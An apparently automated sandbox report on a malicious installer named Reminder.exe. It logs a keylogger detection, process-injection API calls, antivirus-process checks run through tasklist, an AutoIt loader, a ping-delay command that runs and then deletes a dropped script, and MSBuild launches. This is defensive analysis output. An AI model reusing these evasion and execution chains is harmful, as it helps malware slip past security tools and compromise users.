Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00D09FB4 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 38_2_00D09FB4
Yara detected Keylogger Generic
Source: Yara match File source: Process Memory Space: Updater.exe PID: 1612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AutoIt3.exe PID: 2536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AutoIt3.exe PID: 3272, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B5BC9 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject, 35_2_014B5BC9
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B9051 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount, 35_2_014B9051
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_016688E9 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount, 38_2_016688E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_00429C1A NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 41_2_00429C1A
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073E3CB: CreateFileW,DeviceIoControl,CloseHandle, 35_2_0073E3CB
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073230F LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 35_2_0073230F
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073F76E ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 35_2_0073F76E
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CDF76E ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 38_2_00CDF76E
Detected potential crypto function
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006D7070 35_2_006D7070
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006E3AD9 35_2_006E3AD9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0070E32F 35_2_0070E32F
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F24CA 35_2_006F24CA
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00706599 35_2_00706599
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0075C844 35_2_0075C844
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F29E3 35_2_006F29E3
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006FC9C0 35_2_006FC9C0
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006ECBF0 35_2_006ECBF0
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00706C09 35_2_00706C09
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00742D81 35_2_00742D81
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006DCE20 35_2_006DCE20
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006DEE00 35_2_006DEE00
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F2F23 35_2_006F2F23
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006EF0DA 35_2_006EF0DA
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00739168 35_2_00739168
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0076525A 35_2_0076525A
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006ED37F 35_2_006ED37F
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F7746 35_2_006F7746
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F1964 35_2_006F1964
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F7975 35_2_006F7975
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F7BD2 35_2_006F7BD2
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006DDC70 35_2_006DDC70
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00709D1E 35_2_00709D1E
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F1FC1 35_2_006F1FC1
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B89A9 35_2_014B89A9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B89A2 35_2_014B89A2
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C77070 38_2_00C77070
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C83AD9 38_2_00C83AD9
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CAE32F 38_2_00CAE32F
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C924CA 38_2_00C924CA
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CA6599 38_2_00CA6599
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CFC844 38_2_00CFC844
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C9C9C0 38_2_00C9C9C0
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C929E3 38_2_00C929E3
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C8CBF0 38_2_00C8CBF0
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CA6C09 38_2_00CA6C09
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CE2D81 38_2_00CE2D81
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C7EE00 38_2_00C7EE00
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C7CE20 38_2_00C7CE20
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C92F23 38_2_00C92F23
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C8F0DA 38_2_00C8F0DA
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CD9168 38_2_00CD9168
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00D0525A 38_2_00D0525A
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C8D37F 38_2_00C8D37F
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C97746 38_2_00C97746
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C91964 38_2_00C91964
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C97975 38_2_00C97975
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C97BD2 38_2_00C97BD2
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C7DC70 38_2_00C7DC70
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CA9D1E 38_2_00CA9D1E
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C91FC1 38_2_00C91FC1
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_01668241 38_2_01668241
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_0166823A 38_2_0166823A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_0040B650 41_2_0040B650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_004051D0 41_2_004051D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_004531E2 41_2_004531E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_0044623A 41_2_0044623A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_0042E2C5 41_2_0042E2C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_004312A3 41_2_004312A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_0045C476 41_2_0045C476
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_004064C0 41_2_004064C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_00405480 41_2_00405480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_0045C596 41_2_0045C596
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_00433644 41_2_00433644
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_00405730 41_2_00405730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_00449780 41_2_00449780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_00453969 41_2_00453969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_0045A9D8 41_2_0045A9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_0042EAB4 41_2_0042EAB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_00441C90 41_2_00441C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_00441D3D 41_2_00441D3D
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0042B460 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0042AD72 appears 68 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 00424030 appears 131 times
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: String function: 006F488E appears 34 times
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: String function: 006F1000 appears 41 times
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: String function: 006F014F appears 40 times
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: String function: 006DFA3B appears 33 times
Source: C:\edgheaa\AutoIt3.exe Code function: String function: 00C7FA3B appears 33 times
Source: C:\edgheaa\AutoIt3.exe Code function: String function: 00C9488E appears 34 times
Source: C:\edgheaa\AutoIt3.exe Code function: String function: 00C91000 appears 41 times
Source: C:\edgheaa\AutoIt3.exe Code function: String function: 00C9014F appears 40 times
PE / OLE file has an invalid certificate
Source: Reminder.exe Static PE information: invalid certificate
PE file contains executable resources (Code or Archives)
Source: Reminder.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Reminder.tmp.2.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
PE file contains more sections than normal
Source: Reminder.exe Static PE information: Number of sections : 11 > 10
Source: Reminder.tmp.0.dr Static PE information: Number of sections : 11 > 10
Source: Reminder.tmp.2.dr Static PE information: Number of sections : 11 > 10
Sample file is different than original file name gathered from version info
Source: Reminder.exe, 00000000.00000003.1680434117.000000000308E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs Reminder.exe
Source: Reminder.exe, 00000000.00000000.1678861774.0000000000919000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs Reminder.exe
Source: Reminder.exe, 00000000.00000003.1680920376.000000007F5BA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs Reminder.exe
Uses 32bit PE files
Source: Reminder.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal92.troj.spyw.evad.winEXE@73/16@0/2
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00744573 GetLastError,FormatMessageW, 35_2_00744573
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_007321C9 AdjustTokenPrivileges,CloseHandle, 35_2_007321C9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_007327D9 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 35_2_007327D9
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CD21C9 AdjustTokenPrivileges,CloseHandle, 38_2_00CD21C9
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CD27D9 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 38_2_00CD27D9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00745D7E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 35_2_00745D7E
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073E2AB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CompareStringW,CloseHandle, 35_2_0073E2AB
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00738056 CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode, 35_2_00738056
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00743DBD CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 35_2_00743DBD
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\friend Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4296:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: \Sessions\1\BaseNamedObjects\cb36de7f397799e419deb9caf3a96a89
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03
Source: C:\Users\user\Desktop\Reminder.exe File created: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization Jump to behavior
Source: MSBuild.exe String found in binary or memory: " /add /y
Source: MSBuild.exe String found in binary or memory: " /add
Source: C:\Users\user\Desktop\Reminder.exe File read: C:\Users\user\Desktop\Reminder.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe"
Source: C:\Users\user\Desktop\Reminder.exe Process created: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp" /SL5="$20434,1768989,845824,C:\Users\user\Desktop\Reminder.exe"
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Users\user\Desktop\Reminder.exe Process created: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp" /SL5="$20442,1768989,845824,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Users\user\AppData\Local\friend\Updater.exe "C:\Users\user\AppData\Local\friend\\Updater.exe" "C:\Users\user\AppData\Local\friend\\yeorling.csv"
Source: C:\Users\user\AppData\Local\friend\Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\huv9LF4.a3x && del C:\ProgramData\\huv9LF4.a3x
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\friend\Updater.exe updater.exe C:\ProgramData\\huv9LF4.a3x
Source: C:\Users\user\AppData\Local\friend\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\friend\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown Process created: C:\edgheaa\AutoIt3.exe "C:\edgheaa\AutoIt3.exe" C:\edgheaa\fkccfcd.a3x
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown Process created: C:\edgheaa\AutoIt3.exe "C:\edgheaa\AutoIt3.exe" C:\edgheaa\fkccfcd.a3x
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\Reminder.exe Process created: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp" /SL5="$20434,1768989,845824,C:\Users\user\Desktop\Reminder.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe Process created: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp" /SL5="$20442,1768989,845824,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Users\user\AppData\Local\friend\Updater.exe "C:\Users\user\AppData\Local\friend\\Updater.exe" "C:\Users\user\AppData\Local\friend\\yeorling.csv" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
